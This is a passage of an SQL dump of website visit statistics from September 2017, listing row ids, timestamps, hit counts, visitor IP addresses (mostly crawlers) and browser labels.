0,'51.255.65.31','other'),(159312,1506108989,2,0,2,0,'66.249.66.201',''),(159313,1506109253,1,1,0,0,'141.8.142.201','other'),(159314,1506109726,1,1,0,0,'188.166.167.51','other'),(159315,1506109734,1,1,0,0,'5.45.207.64','other'),(159316,1506109940,1,1,0,0,'51.255.65.33','other'),(159317,1506110328,1,0,1,0,'66.249.66.199',''),(159318,1506110643,1,1,0,0,'51.255.71.128','other'),(159319,1506110914,1,1,0,0,'178.154.171.75','other'),(159320,1506110936,1,1,0,0,'66.249.66.199','chrome'),(159321,1506111109,1,1,0,0,'207.46.13.170','other'),(159322,1506111295,37,37,0,0,'88.99.19.242','other'),(159323,1506111911,1,1,0,0,'5.45.207.9','other'),(159324,1506112304,1,1,0,0,'178.92.85.5','firefox'),(159325,1506113353,1,1,0,0,'37.9.113.87','other'),(159326,1506113357,1,1,0,0,'5.45.207.9','other'),(159327,1506113825,1,1,0,0,'51.255.65.45','other'),(159328,1506114202,1,1,0,0,'51.255.65.3','other'),(159329,1506114741,1,1,0,0,'51.255.71.111','other'),(159330,1506114915,1,1,0,0,'5.45.207.64','other'),(159331,1506115090,1,1,0,0,'107.167.104.149','opera'),(159332,1506116233,1,1,0,0,'51.255.71.117','other'),(159333,1506117059,2,2,0,0,'5.45.207.64','other'),(159334,1506117180,1,1,0,0,'37.9.113.87','other'),(159335,1506117232,1,1,0,0,'91.196.178.35','chrome'),(159336,1506117280,1,1,0,0,'8.29.198.27','other'),(159337,1506117527,1,1,0,0,'217.182.132.14','other'),(159338,1506117809,1,1,0,0,'217.182.132.156','other'),(159339,1506117887,1,1,0,0,'51.255.71.123','other'),(159340,1506117896,1,0,1,0,'66.249.66.195',''),(159341,1506118351,1,1,0,0,'217.182.132.36','other'),(159342,1506118411,1,1,0,0,'51.255.71.114','other'),(159343,1506119705,2,2,0,0,'5.45.207.64','other'),(159344,1506120030,1,1,0,0,'51.255.71.100','other'),(159345,1506120988,1,1,0,0,'217.182.132.36','other'),(159346,1506121180,1,1,0,0,'180.76.15.29','other'),(159347,1506121424,1,1,0,0,'51.255.65.65','other'),(159348,1506121733,1,1,0,0,'51.255.65.62','other'),(159349,1506121776,1,1,0,0,'51.255.65.91','other'),(159350,1506122124,1,1,0,0,'37.9.113.119','other'),(159351,1506122279,1,1,0,0,'51.255.71.115','other'),(159352,1506123230,1,1,0,0,'51.255.65.72','other'),(159353,1506123634,1,1,0,0,'164.132.162.187','other'),(159354,1506123797,1,1,0,0,'51.255.65.48','other'),(159355,1506123839,1,1,0,0,'91.209.11.236','other'),(159356,1506124182,1,1,0,0,'217.182.132.70','other'),(159357,1506124446,1,0,1,0,'66.249.66.195',''),(159358,1506125125,1,1,0,0,'178.154.171.75','other'),(159359,1506125632,1,0,1,0,'68.180.228.221',''),(159360,1506125761,1,1,0,0,'217.182.132.187','other'),(159361,1506125931,1,1,0,0,'95.108.181.122','other'),(159362,1506126787,1,1,0,0,'164.132.164.180','other'),(159363,1506127046,1,1,0,0,'91.209.11.236','other'),(159364,1506127389,1,1,0,0,'51.255.65.80','other'),(159365,1506127456,1,1,0,0,'217.182.132.55','other'),(159366,1506128101,1,1,0,0,'8.29.198.25','other'),(159367,1506128217,1,1,0,0,'51.255.65.71','other'),(159368,1506128473,1,1,0,0,'37.9.113.188','other'),(159369,1506128479,1,1,0,0,'81.1.242.33','other'),(159370,1506129574,1,1,0,0,'217.182.132.64','other'),(159371,1506129947,1,1,0,0,'217.182.132.78','other'),(159372,1506130754,1,1,0,0,'217.182.132.83','other'),(159373,1506130755,1,1,0,0,'137.74.201.108','other'),(159374,1506131307,1,1,0,0,'217.182.132.241','other'),(159375,1506131653,1,1,0,0,'51.255.65.37','other'),(159376,1506132066,1,1,0,0,'217.182.132.37','other'),(159377,1506132070,2,2,0,0,'216.244.66.237','other'),(159378,1506132812,1,1,0,0,'217.182.132.182','other'),(159379,1506132882,1,1,0,0,'157.55.39.159','other'),(159380,1506133083,1,1,0,0,'217.182.132.147','other'),(159381,1506133211,1,1,0,0,'51.255.65.15','other'),(159382,1506133247,1,1,0,0,'51.255.65.28','other'),(159383,1506133453,1,1,0,0,'180.76.15.143','other'),(159384,1506134081,1,1,0,0,'51.255.65.6','other'),(159385,1506134496,1,0,1,0,'66.249.66.199',''),(159386,1506134826,1,1,0,0,'178.154.171.24','other'),(159387,1506135547,2,2,0,0,'216.244.66.237','other'),(159388,1506135769,1,1,0,0,'51.255.65.85','other'),(159389,1506136138,1,0,1,0,'66.249.66.195',''),(159390,1506136165,1,1,0,0,'5.45.207.9','other'),(159391,1506136179,1,0,1,0,'66.249.66.199',''),(159392,1506136216,1,1,0,0,'217.182.132.63','other'),(159393,1506136525,1,0,1,0,'68.180.228.221',''),(159394,1506136679,1,1,0,0,'107.167.104.149','opera'),(159395,1506137536,1,1,0,0,'5.45.207.9','other'),(159396,1506137658,1,1,0,0,'51.255.71.128','other'),(159397,1506137716,1,0,1,0,'66.249.66.201',''),(159398,1506137718,1,1,0,0,'51.255.71.101','other'),(159399,1506138285,1,1,0,0,'5.45.207.64','other'),(159400,1506138786,1,1,0,0,'217.182.132.155','other'),(159401,1506138915,1,1,0,0,'51.255.65.32','other'),(159402,1506138927,1,1,0,0,'8.29.198.27','other'),(159403,1506138965,1,0,1,0,'68.180.228.221',''),(159404,1506139257,1,1,0,0,'217.182.132.6','other'),(159405,1506139266,1,1,0,0,'51.255.65.38','other'),(159406,1506139804,1,1,0,0,'51.255.71.115','other'),(159407,1506140088,1,1,0,0,'137.74.207.101','other'),(159408,1506140206,2,2,0,0,'5.45.207.9','other'),(159409,1506140313,1,1,0,0,'5.45.207.64','other'),(159410,1506140640,1,1,0,0,'164.132.162.155','other'),(159411,1506140941,1,1,0,0,'217.182.132.69','other'),(159412,1506141531,1,1,0,0,'5.45.207.64','other'),(159413,1506142003,1,1,0,0,'5.45.207.9','other'),(159414,1506142046,1,1,0,0,'51.255.71.113','other'),(159415,1506142994,1,1,0,0,'5.45.207.9','other'),(159416,1506143068,1,1,0,0,'51.255.71.129','other'),(159417,1506143315,1,1,0,0,'217.182.132.73','other'),(159418,1506143452,1,1,0,0,'51.255.71.123','other'),(159419,1506143955,1,1,0,0,'217.182.132.191','other'),(159420,1506144334,1,1,0,0,'51.255.65.94','other'),(159421,1506144345,1,1,0,0,'217.182.132.5','other'),(159422,1506144405,1,1,0,0,'217.182.132.55','other'),(159423,1506144770,1,1,0,0,'164.132.162.187','other'),(159424,1506144779,1,1,0,0,'51.255.65.33','other'),(159425,1506144870,1,0,1,0,'66.249.66.75',''),(159426,1506145049,1,0,1,0,'68.180.228.221',''),(159427,1506145197,1,1,0,0,'91.209.11.236','other'),(159428,1506145462,1,1,0,0,'217.69.133.203','other'),(159429,1506145853,1,1,0,0,'137.74.207.116','other'),(159430,1506146472,1,1,0,0,'107.167.107.186','opera'),(159431,1506146489,3,3,0,0,'91.209.11.236','other'),(159432,1506147123,1,1,0,0,'217.182.132.37','other'),(159433,1506147359,2,2,0,0,'5.45.207.64','other'),(159434,1506147477,1,1,0,0,'157.55.39.252','other'),(159435,1506147846,1,1,0,0,'51.255.65.35','other'),(159436,1506148647,1,1,0,0,'5.45.207.64','other'),(159437,1506148815,1,1,0,0,'180.76.15.6','other'),(159438,1506149220,1,1,0,0,'217.182.132.74','other'),(159439,1506149262,2,2,0,0,'216.244.66.237','other'),(159440,1506149466,1,1,0,0,'51.255.65.71','other'),(159441,1506149820,1,1,0,0,'8.29.198.26','other'),(159442,1506150402,1,0,1,0,'68.180.228.221',''),(159443,1506150595,1,1,0,0,'51.255.71.111','other'),(159444,1506151233,1,1,0,0,'157.55.39.250','other'),(159445,1506151643,1,1,0,0,'51.255.65.88','other'),(159446,1506152289,18,18,0,0,'173.212.237.236','other'),(159447,1506152336,1,1,0,0,'51.255.65.64','other'),(159448,1506152452,1,1,0,0,'157.55.39.252','other'),(159449,1506152729,1,1,0,0,'5.45.207.64','other'),(159450,1506152890,1,1,0,0,'51.255.65.15','other'),(159451,1506153141,1,0,1,0,'66.249.66.201',''),(159452,1506153406,1,1,0,0,'178.154.171.75','other'),(159453,1506153950,1,1,0,0,'81.1.242.33','other'),(159454,1506153967,1,1,0,0,'217.182.132.79','other'),(159455,1506154089,1,1,0,0,'217.182.132.170','other'),(159456,1506154296,1,1,0,0,'217.182.132.87','other'),(159457,1506154367,1,1,0,0,'137.74.207.108','other'),(159458,1506154378,1,1,0,0,'51.255.65.2','other'),(159459,1506154533,1,1,0,0,'5.45.207.64','other'),(159460,1506154698,33,33,0,0,'173.212.217.207','other'),(159461,1506154770,1,1,0,0,'5.45.207.9','other'),(159462,1506155275,2,2,0,0,'178.154.171.75','other'),(159463,1506155504,1,1,0,0,'217.182.132.149','other'),(159464,1506155695,1,1,0,0,'51.255.71.115','other'),(159465,1506155723,1,1,0,0,'164.132.162.164','other'),(159466,1506155987,1,1,0,0,'51.255.71.120','other'),(159467,1506156013,1,1,0,0,'5.45.207.64','other'),(159468,1506156694,1,1,0,0,'51.255.65.60','other'),(159469,1506156698,1,1,0,0,'157.55.39.249','other'),(159470,1506156826,1,1,0,0,'217.182.132.63','other'),(159471,1506157127,1,1,0,0,'91.209.11.236','other'),(159472,1506157559,1,1,0,0,'51.255.65.74','other'),(159473,1506157625,1,1,0,0,'51.255.65.57','other'),(159474,1506157661,1,1,0,0,'5.45.207.64','other'),(159475,1506157889,1,1,0,0,'51.255.65.6','other'),(159476,1506158717,1,0,1,0,'66.249.66.201',''),(159477,1506159447,1,1,0,0,'207.46.13.151','other'),(159478,1506159869,1,1,0,0,'5.45.207.64','other'),(159479,1506159948,1,1,0,0,'149.202.202.78','chrome'),(159480,1506159955,1,1,0,0,'51.255.65.34','other'),(159481,1506160199,1,1,0,0,'51.255.71.129','other'),(159482,1506160282,1,1,0,0,'51.255.65.84','other'),(159483,1506160665,1,1,0,0,'8.29.198.25','other'),(159484,1506160764,1,0,1,0,'68.180.228.221',''),(159485,1506160841,1,1,0,0,'5.45.207.9','other'),(159486,1506161193,1,1,0,0,'217.182.132.78','other'),(159487,1506162246,1,1,0,0,'217.182.132.66','other'),(159488,1506162579,1,1,0,0,'217.182.132.78','other'),(159489,1506162836,1,1,0,0,'51.255.71.101','other'),(159490,1506162983,1,1,0,0,'51.255.65.39','other'),(159491,1506163046,1,1,0,0,'95.108.213.20','other'),(159492,1506163331,1,1,0,0,'5.45.207.64','other'),(159493,1506163363,1,0,1,0,'68.180.228.221',''),(159494,1506163475,1,1,0,0,'137.74.207.109','other'),(159495,1506163922,1,1,0,0,'157.55.39.249','other'),(159496,1506163991,1,1,0,0,'217.182.132.190','other'),(159497,1506163998,1,1,0,0,'5.45.207.9','other'),(159498,1506164873,1,1,0,0,'188.226.212.13','chrome'),(159499,1506164975,1,1,0,0,'5.45.207.9','other'),(159500,1506165207,1,1,0,0,'217.182.132.180','other'),(159501,1506165756,1,0,1,0,'66.249.66.195',''),(159502,1506165914,1,1,0,0,'217.182.132.66','other'),(159503,1506166002,1,1,0,0,'199.30.25.14','other'),(159504,1506166281,1,1,0,0,'157.55.39.249','other'),(159505,1506166286,1,1,0,0,'51.255.71.118','other'),(159506,1506166495,1,1,0,0,'207.46.13.151','other'),(159507,1506166634,1,1,0,0,'217.182.132.93','other'),(159508,1506167276,1,1,0,0,'178.255.41.253','chrome'),(159509,1506167650,1,1,0,0,'95.133.150.198','chrome'),(159510,1506167776,2,2,0,0,'5.45.207.9','other'),(159511,1506167946,1,1,0,0,'157.55.39.252','other'),(159512,1506167955,1,1,0,0,'217.182.132.187','other'),(159513,1506167999,1,0,1,0,'66.249.66.75',''),(159514,1506168398,1,1,0,0,'207.46.13.151','other'),(159515,1506168417,1,1,0,0,'217.182.132.24','other'),(159516,1506168545,1,1,0,0,'217.182.132.65','other'),(159517,1506170399,1,1,0,0,'51.255.65.54','other'),(159518,1506170403,1,1,0,0,'5.45.207.9','other'),(159519,1506170487,1,1,0,0,'217.182.132.70','other'),(159520,1506170594,1,1,0,0,'5.45.207.64','other'),(159521,1506170865,1,1,0,0,'108.59.8.80','other'),(159522,1506171496,1,1,0,0,'8.29.198.27','other'),(159523,1506171646,2,2,0,0,'5.45.207.64','other'),(159524,1506171660,1,0,1,0,'66.249.66.201',''),(159525,1506171707,1,0,1,0,'66.249.66.199',''),(159526,1506171867,1,1,0,0,'51.255.65.19','other'),(159527,1506172406,1,1,0,0,'207.46.13.151','other'),(159528,1506172467,1,1,0,0,'51.255.65.17','other'),(159529,1506172689,1,1,0,0,'1.121.148.143','firefox'),(159530,1506172736,1,1,0,0,'51.255.71.117','other'),(159531,1506173007,1,1,0,0,'217.182.132.192','other'),(159532,1506173134,1,0,1,0,'66.249.66.195',''),(159533,1506173173,1,0,1,0,'68.180.228.221',''),(159534,1506173427,1,1,0,0,'51.255.65.88','other'),(159535,1506173439,1,1,0,0,'216.244.66.237','other'),(159536,1506174175,1,1,0,0,'217.182.132.55','other'),(159537,1506174324,1,0,1,0,'68.180.228.221',''),(159538,1506174679,1,1,0,0,'217.182.132.19','other'),(159539,1506174807,1,0,1,0,'66.249.66.195',''),(159540,1506174831,1,1,0,0,'217.182.132.178','other'),(159541,1506175139,1,1,0,0,'5.45.207.64','other'),(159542,1506175236,1,1,0,0,'217.182.132.187','other'),(159543,1506175376,1,1,0,0,'217.182.132.153','other'),(159544,1506175684,1,1,0,0,'178.54.62.127','other'),(159545,1506175964,1,1,0,0,'51.255.65.59','other'),(159546,1506176024,1,0,1,0,'66.249.66.201',''),(159547,1506176044,1,1,0,0,'217.182.132.146','other'),(159548,1506177033,1,1,0,0,'23.101.61.176','other'),(159549,1506177432,1,1,0,0,'137.74.207.116','other'),(159550,1506177609,1,1,0,0,'217.182.132.187','other'),(159551,1506177696,1,1,0,0,'51.255.65.22','other'),(159552,1506178158,1,1,0,0,'180.76.15.134','other'),(159553,1506178367,1,1,0,0,'51.255.65.95','other'),(159554,1506178626,1,1,0,0,'51.255.65.94','other'),(159555,1506178823,3,3,0,0,'216.244.66.237','other'),(159556,1506179205,1,1,0,0,'217.182.132.20','other'),(159557,1506179875,2,2,0,0,'5.45.207.64','other'),(159558,1506180102,1,1,0,0,'66.249.65.155','chrome'),(159559,1506180260,1,1,0,0,'157.55.39.249','other'),(159560,1506180517,1,1,0,0,'164.132.162.156','other'),(159561,1506181314,1,1,0,0,'217.182.132.84','other'),(159562,1506181394,1,1,0,0,'91.209.11.236','other'),(159563,1506182039,1,0,1,0,'66.249.65.157',''),(159564,1506182122,1,1,0,0,'137.74.207.120','other'),(159565,1506182309,1,1,0,0,'37.9.113.87','other'),(159566,1506182327,1,1,0,0,'8.29.198.27','other'),(159567,1506182484,2,2,0,0,'91.196.178.104','chrome'),(159568,1506183261,2,0,2,0,'66.249.65.155',''),(159569,1506183281,1,1,0,0,'217.182.132.32','other'),(159570,1506183686,2,2,0,0,'5.45.207.64','other'),(159571,1506183985,1,1,0,0,'178.154.171.75','other'),(159572,1506184218,1,1,0,0,'217.182.132.80','other'),(159573,1506184425,1,1,0,0,'216.244.66.237','other'),(159574,1506184528,1,1,0,0,'217.76.199.238','other'),(159575,1506184952,1,1,0,0,'51.255.65.84','other'),(159576,1506185060,1,1,0,0,'178.92.8.35','chrome'),(159577,1506185121,1,1,0,0,'51.255.65.74','other'),(159578,1506185155,1,1,0,0,'91.209.11.236','other'),(159579,1506185748,1,1,0,0,'5.45.207.9','other'),(159580,1506185896,1,1,0,0,'66.249.65.125','chrome'),(159581,1506186073,1,1,0,0,'157.55.39.249','other'),(159582,1506186187,1,1,0,0,'185.102.219.116','chrome'),(159583,1506186200,1,0,1,0,'66.249.65.156',''),(159584,1506186342,1,1,0,0,'5.45.207.64','other'),(159585,1506186422,1,1,0,0,'51.255.71.129','other'),(159586,1506186934,1,1,0,0,'107.167.104.16','opera'),(159587,1506187193,1,1,0,0,'51.255.65.36','other'),(159588,1506187292,1,1,0,0,'81.1.242.33','other'),(159589,1506187559,1,1,0,0,'178.92.85.5','chrome'),(159590,1506187756,1,0,1,0,'66.249.65.155',''),(159591,1506187979,1,1,0,0,'51.255.65.88','other'),(159592,1506189398,1,1,0,0,'217.182.132.14','other'),(159593,1506189497,1,1,0,0,'217.182.132.148','other'),(159594,1506189606,1,1,0,0,'217.182.132.88','other'),(159595,1506190345,1,1,0,0,'5.45.207.64','other'),(159596,1506190464,1,1,0,0,'188.255.119.78','msie'),(159597,1506190505,1,1,0,0,'91.209.11.236','other'),(159598,1506190586,1,1,0,0,'217.182.132.63','other'),(159599,1506190643,1,0,1,0,'66.249.65.156',''),(159600,1506190866,1,1,0,0,'164.132.162.156','other'),(159601,1506191196,1,1,0,0,'164.132.162.187','other'),(159602,1506191449,1,1,0,0,'130.180.209.164','firefox'),(159603,1506192517,1,1,0,0,'51.255.65.58','other'),(159604,1506192574,1,1,0,0,'137.74.207.188','other'),(159605,1506192857,1,1,0,0,'217.182.132.152','other'),(159606,1506193152,1,1,0,0,'8.29.198.25','other'),(159607,1506193433,1,1,0,0,'217.182.132.148','other'),(159608,1506193816,1,1,0,0,'137.74.207.102','other'),(159609,1506194072,1,1,0,0,'91.196.178.131','chrome'),(159610,1506194105,1,1,0,0,'91.196.178.130','chrome'),(159611,1506194453,1,1,0,0,'217.182.132.182','other'),(159612,1506194963,30,30,0,0,'167.114.219.41','other'),(159613,1506195086,1,1,0,0,'91.196.178.131','chrome'),(159614,1506195348,1,1,0,0,'66.249.65.155','chrome'),(159615,1506195396,1,1,0,0,'217.182.132.76','other'),(159616,1506195660,2,2,0,0,'5.45.207.9','other'),(159617,1506195681,1,1,0,0,'217.182.132.86','other'),(159618,1506196034,1,1,0,0,'217.182.132.170','other'),(159619,1506196247,1,1,0,0,'217.182.132.148','other'),(159620,1506196414,1,1,0,0,'51.255.65.64','other'),(159621,1506196605,1,1,0,0,'46.211.2.200','chrome'),(159622,1506196606,1,1,0,0,'31.13.113.94','other'),(159623,1506196832,1,1,0,0,'217.182.132.180','other'),(159624,1506197619,1,0,1,0,'66.249.65.157',''),(159625,1506197635,1,1,0,0,'178.154.171.75','other'),(159626,1506197793,1,1,0,0,'217.182.132.182','other'),(159627,1506197977,1,1,0,0,'5.45.207.64','other'),(159628,1506198013,1,1,0,0,'217.182.132.188','other'),(159629,1506198415,1,1,0,0,'5.45.207.9','other'),(159630,1506198453,1,1,0,0,'69.30.211.2','other'),(159631,1506198488,1,1,0,0,'217.182.132.95','other'),(159632,1506198870,1,1,0,0,'217.182.132.34','other'),(159633,1506198986,1,1,0,0,'51.255.65.5','other'),(159634,1506199233,33,33,0,0,'173.208.228.146','other'),(159635,1506199377,1,1,0,0,'164.132.162.159','other'),(159636,1506199541,1,1,0,0,'51.255.65.62','other'),(159637,1506199717,1,1,0,0,'5.45.207.64','other'),(159638,1506199786,2,2,0,0,'144.76.115.190','other'),(159639,1506200076,1,1,0,0,'5.45.207.9','other'),(159640,1506200302,1,1,0,0,'217.182.132.7','other'),(159641,1506200993,1,1,0,0,'217.182.132.67','other'),(159642,1506201085,1,1,0,0,'141.8.183.10','other'),(159643,1506201632,1,1,0,0,'157.55.39.235','other'),(159644,1506202128,1,0,1,0,'66.249.65.155',''),(159645,1506202134,1,1,0,0,'217.182.132.78','other'),(159646,1506202558,1,1,0,0,'51.255.65.64','other'),(159647,1506202803,1,1,0,0,'217.182.132.22','other'),(159648,1506203536,1,1,0,0,'37.9.113.122','other'),(159649,1506203645,1,0,1,0,'66.249.65.155',''),(159650,1506203650,1,1,0,0,'217.182.132.53','other'),(159651,1506203982,1,1,0,0,'8.29.198.27','other'),(159652,1506204163,1,1,0,0,'217.182.132.52','other'),(159653,1506204354,1,1,0,0,'51.255.71.121','other'),(159654,1506205440,1,1,0,0,'5.45.207.64','other'),(159655,1506205511,1,1,0,0,'51.255.64.106','other'),(159656,1506205827,1,1,0,0,'91.209.11.236','other'),(159657,1506206138,1,1,0,0,'51.255.71.113','other'),(159658,1506206819,1,1,0,0,'164.132.162.187','other'),(159659,1506207556,1,1,0,0,'91.209.11.236','other'),(159660,1506207756,1,1,0,0,'217.182.132.183','other'),(159661,1506208169,1,1,0,0,'107.21.1.8','other'),(159662,1506208283,1,0,1,0,'66.249.65.156',''),(159663,1506208500,1,1,0,0,'5.45.207.9','other'),(159664,1506208551,1,1,0,0,'51.255.65.75','other'),(159665,1506208682,1,1,0,0,'51.255.65.27','other'),(159666,1506209074,1,1,0,0,'217.182.132.34','other'),(159667,1506209893,1,1,0,0,'217.182.132.5','other'),(159668,1506210215,2,2,0,0,'5.45.207.9','other'),(159669,1506210273,1,1,0,0,'217.182.132.75','other'),(159670,1506210844,1,1,0,0,'51.255.65.69','other'),(159671,1506210942,1,1,0,0,'217.182.132.86','other'),(159672,1506212106,1,1,0,0,'217.182.132.151','other'),(159673,1506212661,1,1,0,0,'51.255.65.24','other'),(159674,1506213501,1,1,0,0,'178.154.200.35','other'),(159675,1506213958,1,1,0,0,'51.255.65.86','other'),(159676,1506214158,2,2,0,0,'217.182.132.157','other'),(159677,1506214439,1,1,0,0,'5.45.207.64','other'),(159678,1506214514,1,1,0,0,'51.255.65.14','other'),(159679,1506214530,1,0,1,0,'66.249.65.123',''),(159680,1506214811,1,1,0,0,'8.29.198.27','other'),(159681,1506215335,1,1,0,0,'5.45.207.9','other'),(159682,1506215649,1,1,0,0,'217.182.132.188','other'),(159683,1506216772,1,1,0,0,'217.69.133.9','other'),(159684,1506217193,1,1,0,0,'217.182.132.82','other'),(159685,1506217237,1,1,0,0,'137.74.201.99','other'),(159686,1506217886,1,1,0,0,'95.108.213.20','other'),(159687,1506218409,1,1,0,0,'51.255.65.26','other'),(159688,1506218653,1,1,0,0,'217.69.133.3','other'),(159689,1506219170,1,1,0,0,'217.182.132.31','other'),(159690,1506219355,1,1,0,0,'217.182.132.6','other'),(159691,1506219985,1,1,0,0,'5.45.207.9','other'),(159692,1506220094,1,1,0,0,'51.255.65.30','other'),(159693,1506220488,1,1,0,0,'51.255.65.17','other'),(159694,1506220605,1,0,1,0,'66.249.65.156',''),(159695,1506221010,1,1,0,0,'5.45.207.64','other'),(159696,1506221727,1,1,0,0,'217.182.132.35','other'),(159697,1506222238,1,1,0,0,'180.76.15.33','other'),(159698,1506222343,1,1,0,0,'207.46.13.191','other'),(159699,1506222742,1,1,0,0,'51.255.71.114','other'),(159700,1506222988,1,1,0,0,'217.182.132.33','other'),(159701,1506223057,1,1,0,0,'137.74.201.99','other'),(159702,1506223162,1,1,0,0,'217.182.132.29','other'),(159703,1506224008,1,1,0,0,'217.182.132.183','other'),(159704,1506224130,1,1,0,0,'217.182.132.51','other'),(159705,1506224181,1,1,0,0,'164.132.162.158','other'),(159706,1506224303,1,1,0,0,'137.74.201.100','other'),(159707,1506224351,1,1,0,0,'5.45.207.64','other'),(159708,1506225305,2,2,0,0,'5.45.207.64','other'),(159709,1506225648,1,1,0,0,'8.29.198.26','other'),(159710,1506225786,1,1,0,0,'164.132.162.159','other'),(159711,1506226269,1,0,1,0,'66.249.65.123',''),(159712,1506226493,1,0,1,0,'66.249.65.156',''),(159713,1506226687,1,1,0,0,'180.76.15.21','other'),(159714,1506226837,1,1,0,0,'51.255.65.18','other'),(159715,1506227417,1,1,0,0,'51.255.65.43','other'),(159716,1506227558,1,1,0,0,'217.182.132.33','other'),(159717,1506227919,1,1,0,0,'217.182.132.51','other'),(159718,1506229114,1,1,0,0,'37.9.113.87','other'),(159719,1506229727,2,2,0,0,'46.48.13.161','other'),(159720,1506230007,1,0,1,0,'66.249.65.156',''),(159721,1506230510,1,1,0,0,'217.182.132.148','other'),(159722,1506230554,1,1,0,0,'51.255.65.47','other'),(159723,1506231192,1,1,0,0,'217.182.132.60','other'),(159724,1506231561,1,1,0,0,'51.255.65.7','other'),(159725,1506231873,1,1,0,0,'195.54.42.22','chrome'),(159726,1506231888,1,1,0,0,'5.45.207.9','other'),(159727,1506232188,1,1,0,0,'217.182.132.54','other'),(159728,1506232286,1,1,0,0,'93.175.233.179','other'),(159729,1506232364,1,1,0,0,'217.182.132.70','other'),(159730,1506232782,1,1,0,0,'51.255.65.4','other'),(159731,1506232905,1,1,0,0,'217.182.132.84','other'),(159732,1506233276,2,2,0,0,'5.45.207.64','other'),(159733,1506233719,1,1,0,0,'51.255.71.98','other'),(159734,1506234185,2,2,0,0,'37.9.113.87','other'),(159735,1506234753,1,1,0,0,'137.74.207.164','other'),(159736,1506235481,1,1,0,0,'5.45.207.64','other'),(159737,1506235813,3,3,0,0,'46.48.13.161','chrome'),(159738,1506236310,1,1,0,0,'5.45.207.9','other'),(159739,1506236364,2,0,2,0,'66.249.65.123',''),(159740,1506236480,1,1,0,0,'8.29.198.26','other'),(159741,1506237237,1,1,0,0,'217.77.215.250','chrome'),(159743,1506237596,1,1,0,0,'51.255.65.51','other'),(159744,1506237970,1,0,1,0,'66.249.65.155',''),(159745,1506237972,1,1,0,0,'178.154.171.75','other'),(159746,1506238965,1,1,0,0,'217.182.132.20','other'),(159747,1506239623,1,1,0,0,'216.244.66.237','other'),(159748,1506239722,4,4,0,0,'62.210.101.104','other'),(159749,1506239831,1,1,0,0,'5.45.207.9','other'),(159750,1506240449,2,2,0,0,'5.45.207.64','other'),(159751,1506240527,1,1,0,0,'178.154.171.75','other'),(159752,1506240561,1,1,0,0,'217.69.133.2','other'),(159753,1506240749,2,2,0,0,'5.45.207.9','other'),(159754,1506240992,1,1,0,0,'137.74.207.159','other'),(159755,1506241259,1,0,1,0,'66.249.65.155',''),(159756,1506241425,1,1,0,0,'137.74.201.99','other'),(159757,1506241527,1,1,0,0,'46.161.9.39','chrome'),(159758,1506242269,1,1,0,0,'217.182.132.148','other'),(159759,1506242314,1,1,0,0,'5.45.207.64','other'),(159760,1506242649,1,1,0,0,'216.244.66.237','other'),(159761,1506242698,1,1,0,0,'94.50.197.103','chrome'),(159762,1506242957,1,1,0,0,'51.255.71.130','other'),(159763,1506243082,1,1,0,0,'51.255.65.29','other'),(159764,1506243126,1,1,0,0,'51.255.65.85','other'),(159765,1506243198,1,1,0,0,'51.255.65.70','other'),(159766,1506243286,1,1,0,0,'51.255.65.63','other'),(159767,1506243641,1,1,0,0,'5.45.207.64','other'),(159768,1506243963,1,1,0,0,'51.255.65.21','other'),(159769,1506244380,1,1,0,0,'217.182.132.65','other'),(159770,1506244471,1,1,0,0,'51.255.65.48','other'),(159771,1506244785,1,1,0,0,'217.182.132.5','other'),(159772,1506244904,1,1,0,0,'51.255.65.81','other'),(159773,1506245372,1,1,0,0,'40.77.167.54','other'),(159774,1506245436,1,1,0,0,'5.45.207.9','other'),(159775,1506245450,3,3,0,0,'216.244.66.237','other'),(159776,1506245741,1,1,0,0,'217.182.132.55','other'),(159777,1506246121,1,1,0,0,'51.255.71.112','other'),(159778,1506246133,1,0,1,0,'66.249.65.123',''),(159779,1506246284,1,1,0,0,'217.182.132.156','other'),(159780,1506247303,1,1,0,0,'8.29.198.27','other'),(159781,1506247307,1,1,0,0,'51.255.65.62','other'),(159782,1506247398,1,0,1,0,'68.180.229.52',''),(159783,1506247798,1,1,0,0,'157.55.39.235','other'),(159784,1506247924,1,1,0,0,'5.45.207.64','other'),(159785,1506247945,1,1,0,0,'51.255.65.14','other'),(159786,1506248824,1,1,0,0,'217.182.132.152','other'),(159787,1506248827,1,1,0,0,'157.55.39.252','other'),(159788,1506249225,2,2,0,0,'5.45.207.9','other'),(159789,1506249277,1,1,0,0,'66.249.65.155','chrome'),(159790,1506249300,1,1,0,0,'5.45.207.64','other'),(159791,1506249400,1,1,0,0,'51.255.71.101','other'),(159792,1506250240,1,1,0,0,'217.182.132.82','other'),(159793,1506251389,1,1,0,0,'216.244.66.237','other'),(159794,1506251490,1,0,1,0,'66.249.65.125',''),(159795,1506252218,1,1,0,0,'173.252.91.249','other'),(159796,1506252496,1,1,0,0,'217.182.132.34','other'),(159797,1506253173,1,1,0,0,'95.108.213.20','other'),(159798,1506253249,1,1,0,0,'51.255.65.31','other'),(159799,1506254011,1,1,0,0,'217.182.132.173','other'),(159800,1506254130,1,1,0,0,'95.108.213.20','other'),(159801,1506254741,1,1,0,0,'91.209.11.236','other'),(159802,1506255859,2,2,0,0,'5.45.207.64','other'),(159803,1506256512,1,1,0,0,'178.154.171.75','other'),(159804,1506256689,1,1,0,0,'180.76.15.157','other'),(159805,1506256777,1,1,0,0,'5.45.207.64','other'),(159806,1506256909,1,1,0,0,'107.167.116.63','opera'),(159807,1506257020,1,1,0,0,'185.80.150.220','chrome'),(159808,1506257354,1,1,0,0,'91.196.178.37','chrome'),(159809,1506258125,2,2,0,0,'5.45.207.64','other'),(159810,1506258126,2,2,0,0,'91.209.11.236','other'),(159811,1506258137,1,1,0,0,'8.29.198.27','other'),(159812,1506258614,1,0,1,0,'68.180.229.52',''),(159813,1506258693,1,1,0,0,'217.182.132.14','other'),(159814,1506258777,1,0,1,0,'66.249.65.125',''),(159815,1506259345,1,1,0,0,'216.244.66.237','other'),(159816,1506259587,3,3,0,0,'91.209.11.236','other'),(159817,1506260002,1,1,0,0,'91.196.178.71','chrome'),(159818,1506260225,1,1,0,0,'217.182.132.33','other'),(159819,1506260422,1,1,0,0,'217.182.132.62','other'),(159821,1506260985,1,1,0,0,'199.58.86.209','other'),(159822,1506261310,1,1,0,0,'5.45.207.64','other'),(159823,1506261983,1,0,1,0,'68.180.229.52',''),(159824,1506261997,3,3,0,0,'216.244.66.237','other'),(159825,1506262341,1,1,0,0,'107.167.106.57','other'),(159826,1506262590,1,1,0,0,'217.69.133.9','other'),(159827,1506262597,1,1,0,0,'51.255.65.70','other'),(159828,1506262611,1,1,0,0,'217.182.132.155','other'),(159829,1506262696,1,1,0,0,'217.182.132.68','other'),(159830,1506263034